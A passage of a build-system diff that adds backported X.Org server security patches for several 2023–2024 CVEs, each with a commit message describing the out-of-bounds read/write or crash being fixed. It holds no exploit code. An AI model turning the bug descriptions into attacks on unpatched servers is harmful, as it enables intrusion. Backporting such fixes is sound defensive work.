+ DeviceChangedEvent event = {
+ .header = ET_Internal,
+ .type = ET_DeviceChanged,
+@@ -2549,6 +2551,14 @@ RecalculateMasterButtons(DeviceIntPtr slave)
+ };
+
+ master->button->numButtons = maxbuttons;
++ if (last_num_buttons < maxbuttons) {
++ master->button->xkb_acts = xnfreallocarray(master->button->xkb_acts,
++ maxbuttons,
++ sizeof(XkbAction));
++ memset(&master->button->xkb_acts[last_num_buttons],
++ 0,
++ (maxbuttons - last_num_buttons) * sizeof(XkbAction));
++ }
+
+ memcpy(&event.buttons.names, master->button->labels, maxbuttons *
+ sizeof(Atom));
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch
new file mode 100644
index 0000000000..6392eae3f8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch
@@ -0,0 +1,63 @@
+From 14f480010a93ff962fef66a16412fafff81ad632 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 27 Nov 2023 16:27:49 +1000
+Subject: [PATCH] randr: avoid integer truncation in length check of
+ ProcRRChange*Property
+
+Affected are ProcRRChangeProviderProperty and ProcRRChangeOutputProperty.
+See also xserver@8f454b79 where this same bug was fixed for the core
+protocol and XI.
+
+This fixes an OOB read and the resulting information disclosure.
+
+Length calculation for the request was clipped to a 32-bit integer. With
+the correct stuff->nUnits value the expected request size was
+truncated, passing the REQUEST_FIXED_SIZE check.
+
+The server then proceeded with reading at least stuff->nUnits bytes
+(depending on stuff->format) from the request and stuffing whatever it
+finds into the property. In the process it would also allocate at least
+stuff->nUnits bytes, i.e. 4GB.
+
+CVE-2023-6478, ZDI-CAN-22561
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/14f480010a93ff962fef66a16412fafff81ad632]
+CVE: CVE-2023-6478
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ randr/rrproperty.c | 2 +-
+ randr/rrproviderproperty.c | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/randr/rrproperty.c b/randr/rrproperty.c
+index 25469f57b2..c4fef8a1f6 100644
+--- a/randr/rrproperty.c
++++ b/randr/rrproperty.c
+@@ -530,7 +530,7 @@ ProcRRChangeOutputProperty(ClientPtr client)
+ char format, mode;
+ unsigned long len;
+ int sizeInBytes;
+- int totalSize;
++ uint64_t totalSize;
+ int err;
+
+ REQUEST_AT_LEAST_SIZE(xRRChangeOutputPropertyReq);
+diff --git a/randr/rrproviderproperty.c b/randr/rrproviderproperty.c
+index b79c17f9bf..90c5a9a933 100644
+--- a/randr/rrproviderproperty.c
++++ b/randr/rrproviderproperty.c
+@@ -498,7 +498,7 @@ ProcRRChangeProviderProperty(ClientPtr client)
+ char format, mode;
+ unsigned long len;
+ int sizeInBytes;
+- int totalSize;
++ uint64_t totalSize;
+ int err;
+
+ REQUEST_AT_LEAST_SIZE(xRRChangeProviderPropertyReq);
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch
new file mode 100644
index 0000000000..0bfff268e7
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch
@@ -0,0 +1,55 @@
+From 9e2ecb2af8302dedc49cb6a63ebe063c58a9e7e3 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 14 Dec 2023 11:29:49 +1000
+Subject: [PATCH] dix: allocate enough space for logical button maps
+
+Both DeviceFocusEvent and the XIQueryPointer reply contain a bit for
+each logical button currently down. Since buttons can be arbitrarily mapped
+to anything up to 255, make sure we have enough bits for the maximum mapping.
+
+CVE-2023-6816, ZDI-CAN-22664, ZDI-CAN-22665
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/9e2ecb2af8302dedc49cb6a63ebe063c58a9e7e3]
+CVE: CVE-2023-6816
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xiquerypointer.c | 3 +--
+ dix/enterleave.c | 5 +++--
+ 2 files changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/Xi/xiquerypointer.c b/Xi/xiquerypointer.c
+index 5b77b1a444..2b05ac5f39 100644
+--- a/Xi/xiquerypointer.c
++++ b/Xi/xiquerypointer.c
+@@ -149,8 +149,7 @@ ProcXIQueryPointer(ClientPtr client)
+ if (pDev->button) {
+ int i;
+
+- rep.buttons_len =
+- bytes_to_int32(bits_to_bytes(pDev->button->numButtons));
++ rep.buttons_len = bytes_to_int32(bits_to_bytes(256)); /* button map up to 255 */
+ rep.length += rep.buttons_len;
+ buttons = calloc(rep.buttons_len, 4);
+ if (!buttons)
+diff --git a/dix/enterleave.c b/dix/enterleave.c
+index 867ec74363..ded8679d76 100644
+--- a/dix/enterleave.c
++++ b/dix/enterleave.c
+@@ -784,8 +784,9 @@ DeviceFocusEvent(DeviceIntPtr dev, int type, int mode, int detail,
+
+ mouse = IsFloating(dev) ? dev : GetMaster(dev, MASTER_POINTER);
+
+- /* XI 2 event */
+- btlen = (mouse->button) ? bits_to_bytes(mouse->button->numButtons) : 0;
++ /* XI 2 event contains the logical button map - maps are CARD8
++ * so we need 256 bits for the possibly maximum mapping */
++ btlen = (mouse->button) ? bits_to_bytes(256) : 0;
+ btlen = bytes_to_int32(btlen);
+ len = sizeof(xXIFocusInEvent) + btlen * 4;
+
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch
new file mode 100644
index 0000000000..80ebc64e59
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch
@@ -0,0 +1,87 @@
+From ece23be888a93b741aa1209d1dbf64636109d6a5 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 18 Dec 2023 14:27:50 +1000
+Subject: [PATCH] dix: Allocate sufficient xEvents for our DeviceStateNotify
+
+If a device has both a button class and a key class and numButtons is
+zero, we can get an OOB write due to event under-allocation.
+
+This function seems to assume a device has either keys or buttons, not
+both. It has two virtually identical code paths, both of which assume
+they're applying to the first event in the sequence.
+
+A device with both a key and button class triggered a logic bug - only
+one xEvent was allocated but the deviceStateNotify pointer was pushed on
+once per type. So effectively this logic code:
+
+ int count = 1;
+ if (button && nbuttons > 32) count++;
+ if (key && nbuttons > 0) count++;
+ if (key && nkeys > 32) count++; // this is basically always true
+ // count is at 2 for our keys + zero button device
+
+ ev = alloc(count * sizeof(xEvent));
+ FixDeviceStateNotify(ev);
+ if (button)
+ FixDeviceStateNotify(ev++);
+ if (key)
+ FixDeviceStateNotify(ev++); // santa drops into the wrong chimney here
+
+If the device has more than 3 valuators, the OOB is pushed back - we're
+off by one so it will happen when the last deviceValuator event is
+written instead.
+
+Fix this by allocating the maximum number of events we may allocate.
+Note that the current behavior is not protocol-correct anyway, this
+patch fixes only the allocation issue.
+
+Note that this issue does not trigger if the device has at least one
+button. While the server does not prevent a button class with zero
+buttons, it is very unlikely.
+
+CVE-2024-0229, ZDI-CAN-22678
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/ece23be888a93b741aa1209d1dbf64636109d6a5]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/enterleave.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/dix/enterleave.c b/dix/enterleave.c
+index ded8679d76..17964b00a4 100644
+--- a/dix/enterleave.c
++++ b/dix/enterleave.c
+@@ -675,7 +675,8 @@ static void
+ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+ {
+ int evcount = 1;
+- deviceStateNotify *ev, *sev;
++ deviceStateNotify sev[6 + (MAX_VALUATORS + 2)/3];
++ deviceStateNotify *ev;
+ deviceKeyStateNotify *kev;
+ deviceButtonStateNotify *bev;
+
+@@ -714,7 +715,7 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+ }
+ }
+
+- sev = ev = xallocarray(evcount, sizeof(xEvent));
++ ev = sev;
+ FixDeviceStateNotify(dev, ev, NULL, NULL, NULL, first);
+
+ if (b != NULL) {
+@@ -770,7 +771,6 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+
+ DeliverEventsToWindow(dev, win, (xEvent *) sev, evcount,
+ DeviceStateNotifyMask, NullGrab);
+- free(sev);
+ }
+
+ void
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch
new file mode 100644
index 0000000000..65df74376b
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch
@@ -0,0 +1,221 @@
+From 219c54b8a3337456ce5270ded6a67bcde53553d5 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 18 Dec 2023 12:26:20 +1000
+Subject: [PATCH] dix: fix DeviceStateNotify event calculation
+
+The previous code only made sense if one considers buttons and keys to
+be mutually exclusive on a device. That is not necessarily true, causing
+a number of issues.
+
+This function allocates and fills in the number of xEvents we need to
+send the device state down the wire. This is split across multiple
+32-byte devices including one deviceStateNotify event and optional
+deviceKeyStateNotify, deviceButtonStateNotify and (possibly multiple)
+deviceValuator events.
+
+The previous behavior would instead compose a sequence
+of [state, buttonstate, state, keystate, valuator...]. This is not
+protocol correct, and on top of that made the code extremely convoluted.
+
+Fix this by streamlining: add both button and key into the deviceStateNotify
+and then append the key state and button state, followed by the
+valuators. Finally, the deviceValuator events contain up to 6 valuators
+per event but we only ever sent through 3 at a time. Let's double that
+throughput.
+
+CVE-2024-0229, ZDI-CAN-22678
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/219c54b8a3337456ce5270ded6a67bcde53553d5]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/enterleave.c | 121 ++++++++++++++++++++---------------------------
+ 1 file changed, 52 insertions(+), 69 deletions(-)
+
+diff --git a/dix/enterleave.c b/dix/enterleave.c
+index 17964b00a4..7b7ba1098b 100644
+--- a/dix/enterleave.c
++++ b/dix/enterleave.c
+@@ -615,9 +615,15 @@ FixDeviceValuator(DeviceIntPtr dev, deviceValuator * ev, ValuatorClassPtr v,
+
+ ev->type = DeviceValuator;
+ ev->deviceid = dev->id;
+- ev->num_valuators = nval < 3 ? nval : 3;
++ ev->num_valuators = nval < 6 ? nval : 6;
+ ev->first_valuator = first;
+ switch (ev->num_valuators) {
++ case 6:
++        ev->valuator5 = v->axisVal[first + 5];
++    case 5:
++        ev->valuator4 = v->axisVal[first + 4];
++    case 4:
++        ev->valuator3 = v->axisVal[first + 3];
+ case 3:
+ ev->valuator2 = v->axisVal[first + 2];
+ case 2:
+@@ -626,7 +632,6 @@ FixDeviceValuator(DeviceIntPtr dev, deviceValuator * ev, ValuatorClassPtr v,
+ ev->valuator0 = v->axisVal[first];
+ break;
+ }
+- first += ev->num_valuators;
+ }
+
+ static void
+@@ -646,7 +651,7 @@ FixDeviceStateNotify(DeviceIntPtr dev, deviceStateNotify * ev, KeyClassPtr k,
+ ev->num_buttons = b->numButtons;
+ memcpy((char *) ev->buttons, (char *) b->down, 4);
+ }
+- else if (k) {
++ if (k) {
+ ev->classes_reported |= (1 << KeyClass);
+ ev->num_keys = k->xkbInfo->desc->max_key_code -
+ k->xkbInfo->desc->min_key_code;
+@@ -670,15 +675,26 @@ FixDeviceStateNotify(DeviceIntPtr dev, deviceStateNotify * ev, KeyClassPtr k,
+ }
+ }
+
+-
++/**
++ * The device state notify event is split across multiple 32-byte events.
++ * The first one contains the first 32 button state bits, the first 32
++ * key state bits, and the first 3 valuator values.
++ *
++ * If a device has more than that, the server sends out:
++ * - one deviceButtonStateNotify for buttons 32 and above
++ * - one deviceKeyStateNotify for keys 32 and above
++ * - one deviceValuator event per 6 valuators above valuator 4
++ *
++ * All events but the last one have the deviceid binary ORed with MORE_EVENTS,
++ */
+ static void
+ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+ {
++ /* deviceStateNotify, deviceKeyStateNotify, deviceButtonStateNotify
++ * and one deviceValuator for each 6 valuators */
++ deviceStateNotify sev[3 + (MAX_VALUATORS + 6)/6];
+ int evcount = 1;
+- deviceStateNotify sev[6 + (MAX_VALUATORS + 2)/3];
+- deviceStateNotify *ev;
+- deviceKeyStateNotify *kev;
+- deviceButtonStateNotify *bev;
++ deviceStateNotify *ev = sev;
+
+ KeyClassPtr k;
+ ButtonClassPtr b;
+@@ -691,82 +707,49 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+
+ if ((b = dev->button) != NULL) {
+ nbuttons = b->numButtons;
+- if (nbuttons > 32)
++ if (nbuttons > 32) /* first 32 are encoded in deviceStateNotify */
+ evcount++;
+ }
+ if ((k = dev->key) != NULL) {
+ nkeys = k->xkbInfo->desc->max_key_code - k->xkbInfo->desc->min_key_code;
+- if (nkeys > 32)
++ if (nkeys > 32) /* first 32 are encoded in deviceStateNotify */
+ evcount++;
+- if (nbuttons > 0) {
+- evcount++;
+- }
+ }
+ if ((v = dev->valuator) != NULL) {
+ nval = v->numAxes;
+-
+- if (nval > 3)
+- evcount++;
+- if (nval > 6) {
+- if (!(k && b))
+- evcount++;
+- if (nval > 9)
+- evcount += ((nval - 7) / 3);
+- }
++ /* first three are encoded in deviceStateNotify, then
++ * it's 6 per deviceValuator event */
++ evcount += ((nval - 3) + 6)/6;
+ }
+
+- ev = sev;
+- FixDeviceStateNotify(dev, ev, NULL, NULL, NULL, first);
+-
+- if (b != NULL) {
+- FixDeviceStateNotify(dev, ev++, NULL, b, v, first);
+- first += 3;
+- nval -= 3;
+- if (nbuttons > 32) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- bev = (deviceButtonStateNotify *) ev++;
+- bev->type = DeviceButtonStateNotify;
+- bev->deviceid = dev->id;
+- memcpy((char *) &bev->buttons[4], (char *) &b->down[4],
+- DOWN_LENGTH - 4);
+- }
+- if (nval > 0) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
+- first += 3;
+- nval -= 3;
+- }
++ BUG_RETURN(evcount <= ARRAY_SIZE(sev));
++
++ FixDeviceStateNotify(dev, ev, k, b, v, first);
++
++ if (b != NULL && nbuttons > 32) {
++ deviceButtonStateNotify *bev = (deviceButtonStateNotify *) ++ev;
++ (ev - 1)->deviceid |= MORE_EVENTS;
++ bev->type = DeviceButtonStateNotify;
++ bev->deviceid = dev->id;
++ memcpy((char *) &bev->buttons[4], (char *) &b->down[4],
++ DOWN_LENGTH - 4);
+ }
+
+- if (k != NULL) {
+- FixDeviceStateNotify(dev, ev++, k, NULL, v, first);
+- first += 3;
+- nval -= 3;
+- if (nkeys > 32) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- kev = (deviceKeyStateNotify *) ev++;
+- kev->type = DeviceKeyStateNotify;
+- kev->deviceid = dev->id;
+- memmove((char *) &kev->keys[0], (char *) &k->down[4], 28);
+- }
+- if (nval > 0) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
+- first += 3;
+- nval -= 3;
+- }
++ if (k != NULL && nkeys > 32) {
++ deviceKeyStateNotify *kev = (deviceKeyStateNotify *) ++ev;
++ (ev - 1)->deviceid |= MORE_EVENTS;
++ kev->type = DeviceKeyStateNotify;
++ kev->deviceid = dev->id;
++ memmove((char *) &kev->keys[0], (char *) &k->down[4], 28);
+ }
+
++ first = 3;
++ nval -= 3;
+ while (nval > 0) {
+- FixDeviceStateNotify(dev, ev++, NULL, NULL, v, first);
+- first += 3;
+- nval -= 3;
+- if (nval > 0) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
+- first += 3;
+- nval -= 3;
+- }
++ ev->deviceid |= MORE_EVENTS;
++ FixDeviceValuator(dev, (deviceValuator *) ++ev, v, first);
++ first += 6;
++ nval -= 6;
+ }
+
+ DeliverEventsToWindow(dev, win, (xEvent *) sev, evcount,
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch
new file mode 100644
index 0000000000..742c122fa8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch
@@ -0,0 +1,41 @@
+From df3c65706eb169d5938df0052059f3e0d5981b74 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 21 Dec 2023 13:48:10 +1000
+Subject: [PATCH] Xi: when creating a new ButtonClass, set the number of
+ buttons
+
+There's a racy sequence where a master device may copy the button class
+from the slave, without ever initializing numButtons. This leads to a
+device with zero buttons but a button class which is invalid.
+
+Let's copy the numButtons value from the source - by definition if we
+don't have a button class yet we do not have any other slave devices
+with more than this number of buttons anyway.
+
+CVE-2024-0229, ZDI-CAN-22678
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/df3c65706eb169d5938df0052059f3e0d5981b74]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/exevents.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/Xi/exevents.c b/Xi/exevents.c
+index 54ea11a938..e161714682 100644
+--- a/Xi/exevents.c
++++ b/Xi/exevents.c
+@@ -605,6 +605,7 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
+ to->button = calloc(1, sizeof(ButtonClassRec));
+ if (!to->button)
+ FatalError("[Xi] no memory for class shift.\n");
++ to->button->numButtons = from->button->numButtons;
+ }
+ else
+ classes->button = NULL;
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch
new file mode 100644
index 0000000000..d1a6214793
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch
@@ -0,0 +1,45 @@
+From 37539cb0bfe4ed96d4499bf371e6b1a474a740fe Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 21 Dec 2023 14:10:11 +1000
+Subject: [PATCH] Xi: require a pointer and keyboard device for
+ XIAttachToMaster
+
+If we remove a master device and specify which other master devices
+attached slaves should be returned to, enforce that those two are
+indeed a pointer and a keyboard.
+
+Otherwise we can try to attach the keyboards to pointers and vice versa,
+leading to possible crashes later.
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/37539cb0bfe4ed96d4499bf371e6b1a474a740fe]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xichangehierarchy.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
+index 504defe566..d2d985848d 100644
+--- a/Xi/xichangehierarchy.c
++++ b/Xi/xichangehierarchy.c
+@@ -270,7 +270,7 @@ remove_master(ClientPtr client, xXIRemoveMasterInfo * r, int flags[MAXDEVICES])
+ if (rc != Success)
+ goto unwind;
+
+- if (!IsMaster(newptr)) {
++ if (!IsMaster(newptr) || !IsPointerDevice(newptr)) {
+ client->errorValue = r->return_pointer;
+ rc = BadDevice;
+ goto unwind;
+@@ -281,7 +281,7 @@ remove_master(ClientPtr client, xXIRemoveMasterInfo * r, int flags[MAXDEVICES])
+ if (rc != Success)
+ goto unwind;
+
+- if (!IsMaster(newkeybd)) {
++ if (!IsMaster(newkeybd) || !IsKeyboardDevice(newkeybd)) {
+ client->errorValue = r->return_keyboard;
+ rc = BadDevice;
+ goto unwind;
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch
new file mode 100644
index 0000000000..c8f75d8a7e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch
@@ -0,0 +1,64 @@
+From e5e8586a12a3ec915673edffa10dc8fe5e15dac3 Mon Sep 17 00:00:00 2001
+From: Olivier Fourdan <ofourdan@redhat.com>
+Date: Wed, 6 Dec 2023 12:09:41 +0100
+Subject: [PATCH] glx: Call XACE hooks on the GLX buffer
+
+The XSELINUX code will label resources at creation by checking the
+access mode. When the access mode is DixCreateAccess, it will call the
+function to label the new resource SELinuxLabelResource().
+
+However, GLX buffers do not go through the XACE hooks when created,
+hence leaving the resource actually unlabeled.
+
+When, later, the client tries to create another resource using that
+drawable (like a GC for example), the XSELINUX code would try to use
+the security ID of that object which has never been labeled, get a NULL
+pointer and crash when checking whether the requested permissions are
+granted for the subject security ID.
+
+To avoid the issue, make sure to call the XACE hooks when creating the
+GLX buffers.
+
+Credit goes to Donn Seeley <donn@xmission.com> for providing the patch.
+
+CVE-2024-0408
+
+Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
+Acked-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/e5e8586a12a3ec915673edffa10dc8fe5e15dac3]
+CVE: CVE-2024-0408
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ glx/glxcmds.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/glx/glxcmds.c b/glx/glxcmds.c
+index fc26a2e345..1e46d0c723 100644
+--- a/glx/glxcmds.c
++++ b/glx/glxcmds.c
+@@ -48,6 +48,7 @@
+ #include "indirect_util.h"
+ #include "protocol-versions.h"
+ #include "glxvndabi.h"
++#include "xace.h"
+
+ static char GLXServerVendorName[] = "SGI";
+
+@@ -1392,6 +1393,13 @@ DoCreatePbuffer(ClientPtr client, int screenNum, XID fbconfigId,
+ if (!pPixmap)
+ return BadAlloc;
+
++ err = XaceHook(XACE_RESOURCE_ACCESS, client, glxDrawableId, RT_PIXMAP,
++ pPixmap, RT_NONE, NULL, DixCreateAccess);
++ if (err != Success) {
++ (*pGlxScreen->pScreen->DestroyPixmap) (pPixmap);
++ return err;
++ }
++
+ /* Assign the pixmap the same id as the pbuffer and add it as a
+ * resource so it and the DRI2 drawable will be reclaimed when the
+ * pbuffer is destroyed. */
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch
new file mode 100644
index 0000000000..9763e0b562
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch
@@ -0,0 +1,46 @@
+From 2ef0f1116c65d5cb06d7b6d83f8a1aea702c94f7 Mon Sep 17 00:00:00 2001
+From: Olivier Fourdan <ofourdan@redhat.com>
+Date: Wed, 6 Dec 2023 11:51:56 +0100
+Subject: [PATCH] ephyr,xwayland: Use the proper private key for cursor
+
+The cursor in DIX is actually split in two parts, the cursor itself and
+the cursor bits, each with their own devPrivates.
+
+The cursor itself includes the cursor bits, meaning that the cursor bits
+devPrivates lie within the structure of the cursor.
+
+Both Xephyr and Xwayland were using the private key for the cursor bits
+to store the data for the cursor. When using XSELINUX, which comes
+with its own special devPrivates, the data stored in that cursor bits'
+devPrivates would interfere with the XSELINUX devPrivates data, and the
+SELINUX security ID would point to some other unrelated data, causing a
+crash in the XSELINUX code when trying to (re)use the security ID.
+
+CVE-2024-0409
+
+Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
+Reviewed-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/2ef0f1116c65d5cb06d7b6d83f8a1aea702c94f7]
+CVE: CVE-2024-0409
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/kdrive/ephyr/ephyrcursor.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/kdrive/ephyr/ephyrcursor.c b/hw/kdrive/ephyr/ephyrcursor.c
+index f991899..3f192d0 100644
+--- a/hw/kdrive/ephyr/ephyrcursor.c
++++ b/hw/kdrive/ephyr/ephyrcursor.c
+@@ -246,7 +246,7 @@ miPointerSpriteFuncRec EphyrPointerSpriteFuncs = {
+ Bool
+ ephyrCursorInit(ScreenPtr screen)
+ {
+- if (!dixRegisterPrivateKey(&ephyrCursorPrivateKey, PRIVATE_CURSOR_BITS,
++ if (!dixRegisterPrivateKey(&ephyrCursorPrivateKey, PRIVATE_CURSOR,
+ sizeof(ephyrCursorRec)))
+ return FALSE;
+
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch
new file mode 100644
index 0000000000..7c8fbcc3ec
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch
@@ -0,0 +1,113 @@
+From 4a5e9b1895627d40d26045bd0b7ef3dce503cbd1 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 4 Jan 2024 10:01:24 +1000
+Subject: [PATCH] Xi: flush hierarchy events after adding/removing master
+ devices
+
+The `XISendDeviceHierarchyEvent()` function allocates space to store up
+to `MAXDEVICES` (256) `xXIHierarchyInfo` structures in `info`.
+
+If a device with a given ID was removed and a new device with the same
+ID added both in the same operation, the single device ID will lead to
+two info structures being written to `info`.
+
+Since this case can occur for every device ID at once, a total of two
+times `MAXDEVICES` info structures might be written to the allocation.
+
+To avoid it, once one add/remove master is processed, send out the
+device hierarchy event for the current state and continue. That event
+thus only ever has exactly one of either added/removed in it (and
+optionally slave attached/detached).
+
+CVE-2024-21885, ZDI-CAN-22744
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/4a5e9b1895627d40d26045bd0b7ef3dce503cbd1]
+CVE: CVE-2024-21885
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xichangehierarchy.c | 27 ++++++++++++++++++++++-----
+ 1 file changed, 22 insertions(+), 5 deletions(-)
+
+diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
+index d2d985848d..72d00451e3 100644
+--- a/Xi/xichangehierarchy.c
++++ b/Xi/xichangehierarchy.c
+@@ -416,6 +416,11 @@ ProcXIChangeHierarchy(ClientPtr client)
+ size_t len; /* length of data remaining in request */
+ int rc = Success;
+ int flags[MAXDEVICES] = { 0 };
++ enum {
++ NO_CHANGE,
++ FLUSH,
++ CHANGED,
++ } changes = NO_CHANGE;
+
+ REQUEST(xXIChangeHierarchyReq);
+ REQUEST_AT_LEAST_SIZE(xXIChangeHierarchyReq);
+@@ -465,8 +470,9 @@ ProcXIChangeHierarchy(ClientPtr client)
+ rc = add_master(client, c, flags);
+ if (rc != Success)
+ goto unwind;
+- }
++ changes = FLUSH;
+ break;
++ }
+ case XIRemoveMaster:
+ {
+ xXIRemoveMasterInfo *r = (xXIRemoveMasterInfo *) any;
+@@ -475,8 +481,9 @@ ProcXIChangeHierarchy(ClientPtr client)
+ rc = remove_master(client, r, flags);
+ if (rc != Success)
+ goto unwind;
+- }
++ changes = FLUSH;
+ break;
++ }
+ case XIDetachSlave:
+ {
+ xXIDetachSlaveInfo *c = (xXIDetachSlaveInfo *) any;
+@@ -485,8 +492,9 @@ ProcXIChangeHierarchy(ClientPtr client)
+ rc = detach_slave(client, c, flags);
+ if (rc != Success)
+ goto unwind;
+- }
++ changes = CHANGED;
+ break;
++ }
+ case XIAttachSlave:
+ {
+ xXIAttachSlaveInfo *c = (xXIAttachSlaveInfo *) any;
+@@ -495,16 +503,25 @@ ProcXIChangeHierarchy(ClientPtr client)
+ rc = attach_slave(client, c, flags);
+ if (rc != Success)
+ goto unwind;
++ changes = CHANGED;
++ break;
+ }
++ default:
+ break;
+ }
+
++ if (changes == FLUSH) {
++ XISendDeviceHierarchyEvent(flags);
++ memset(flags, 0, sizeof(flags));
++ changes = NO_CHANGE;
++ }
++
+ len -= any->length * 4;
+ any = (xXIAnyHierarchyChangeInfo *) ((char *) any + any->length * 4);
+ }
+
+ unwind:
+-
